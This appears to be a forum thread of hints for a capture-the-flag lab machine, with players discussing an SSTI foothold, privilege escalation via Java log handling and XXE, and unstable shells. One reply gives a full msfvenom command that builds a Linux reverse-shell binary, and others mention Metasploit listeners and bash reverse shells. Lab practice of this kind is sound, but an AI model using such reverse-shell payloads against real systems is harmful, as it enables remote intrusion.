Wow. I finally got it. The method to get privesc was there the whole time… apparently it was already made by the “injector hacker” panda… lol. I feel like a bozo now.
What I could suggest is to patiently read through the java source code to understand the program logic. I think the root flag is at medium level, so be patient and good luck!
Thanks for this. I looked through exif data on one of the images, but that panda always stood out to me as a red flag. At least now I know what angle I should be taking. Also explains why a cron job is periodically deleting JPEGs from the permissible folders.
I’m still not sure how these machines get rated ‘easy.’ Even the foothold was difficult IMO.
Strange. I swear I had permissions, but then again maybe I was reading the permissions wrong.
Anyone willing to PM me about privesc? I think I understand where I need to inject the code, but I don’t know Java that well. Also I’m unable to access the file despite having group permissions.
help with this
Load key “ssh_key.txt”: error in libcrypto
Hello everyone, I’m new to this, got access to the shell but if I use any command it keeps knocking me out
hmm. not sure what’s going on here. been a while since i finished this. however i’ll say that i always use msfconsole and spin up a multi/handler listener for reverse shells. hopefully that helps
I had the same problem. Try this: msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your IP> LPORT=4444 -f elf > ~/Desktop/shelf.elf
@antarctica17 Which reverse shell are you using? Could be the shell that does something funky like a meterpreter wrapper. It could also be the way you’re spawning the shell. Maybe your calling gadget quits after reading any data from your shell’s stdout, or it crashes on input/output…
Anyway, great machine to hit the ground running again.
Foothold: Enum and fuzzing, I certainly didn’t ever see these magic chars used before
User: Google FTW, or DuckDuckGo if you care about privacy
Root: Path is expected from an easy machine, nothing obscure. Don’t be discouraged by fixed CVEs, due diligence reveals they just fixed a setting, but it’s still enabled by default.
Is there a way to obtain root shell? Only could get root flag(
If you can read the flag, then maybe you can read something else that could give you access to the root user.
Try writing a reverse shell in bash and use $ bash -x shell.sh
I was a Java developer in my youth (lol) and for sure it helps, but I never had to manipulate an XML file that way for root, so it was very funny.
Don’t hesitate to DM for a hint
I find it weird that when cat-ing redpanda.log nothing seems to be displayed. Is it empty? But the Java code says otherwise: App.java is reading lines from this log and is doing something with them.
First Box Finished! far more in-depth than I imagined but extremely fun nonetheless
Hi! Talking about PrivEsc, I guess you are suggesting a different way from the one that most people are doing. I tried to find it but I am a bit lost; some people said you can go through SSH credentials(?), read the Java code and abuse the .log file and XXE, and now you say there is a fixed CVE.
I can’t find the first one, I don’t understand well what the coffee code is doing, and I am having trouble seeing what the CVE could be.
Could you give me a little hint?
Can someone help me with SSTI…
Stuck there for a very long time…
The web application is not loading up. I didn’t even start and I am already running into problems.